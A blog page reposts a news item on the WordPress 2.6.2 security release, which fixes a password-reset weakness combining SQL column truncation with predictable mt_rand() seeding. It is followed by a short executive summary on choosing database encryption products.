Art Hacker
We advocate freedom, equality, sharing and mutual aid

WordPress shuts door on new PHP attack vector

The WordPress patching hamster wheel keeps on rolling and rolling.

According to an advisory from maintainers of the open-source blog software, WordPress 2.6.2 was released on September 8 to mitigate a new attack vector discovered by PHP security guru Stefan Esser.

From the announcement:

“Stefan Esser recently warned developers of the dangers of SQL Column Truncation and the weakness of mt_rand().  With his help we worked around these problems and are now releasing WordPress 2.6.2.  If you allow open registration on your blog, you should definitely upgrade.  With open registration enabled, it is possible in WordPress versions 2.6.1 and earlier to craft a username such that it will allow resetting another user’s password to a randomly generated password.  The randomly generated password is not disclosed to the attacker, so this problem by itself is annoying but not a security exploit.  However, this attack coupled with a weakness in the random number seeding in mt_rand() could be used to predict the randomly generated password.”

WordPress developers said the attack is difficult to accomplish but, because of the associated risk, the patch is being released.

It’s important to note that other PHP applications are vulnerable to this class of attack.

Article Source (Continued)

Database Encryption Solutions

Executive Summary: Database encryption can protect data on Microsoft SQL Server and other database platforms from internal and external attacks. Although SQL Server 2008 and SQL Server 2005 have built-in encryption features, best practice for implementing security solutions involves a layered approach that also incorporates third-party products. Database encryption products generally encrypt at the column level or the file level. Split-key ability, key storage, and ciphers used can be important factors in choosing the right solution for your environment.

Given recent well-publicized data leaks and beefed-up security regulations that require companies to publicly disclose when unencrypted data has been exposed, all companies not using database encryption should be asking themselves why not. At the simplest level, database encryption addresses the concern that an attacker might get through your network’s other defenses or that the attacker might be someone from inside the organization. Encrypting data helps keep your company’s name from appearing in the headlines next to disturbing phrases such as “security breach.” Read more »